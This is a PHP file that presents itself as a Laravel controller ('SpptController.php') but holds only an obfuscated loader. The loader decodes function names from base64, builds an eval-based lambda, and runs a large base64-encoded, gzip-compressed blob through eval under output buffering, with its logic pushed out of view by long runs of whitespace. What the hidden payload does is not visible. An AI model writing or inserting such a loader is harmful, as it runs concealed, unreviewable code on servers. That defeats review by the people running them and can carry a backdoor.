<?php 
        $__='printf';$_='Loading app/Http/Controllers/Transaksi/SpptController.php';
        







































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































































                                                                                                                                                                                                                     $________;
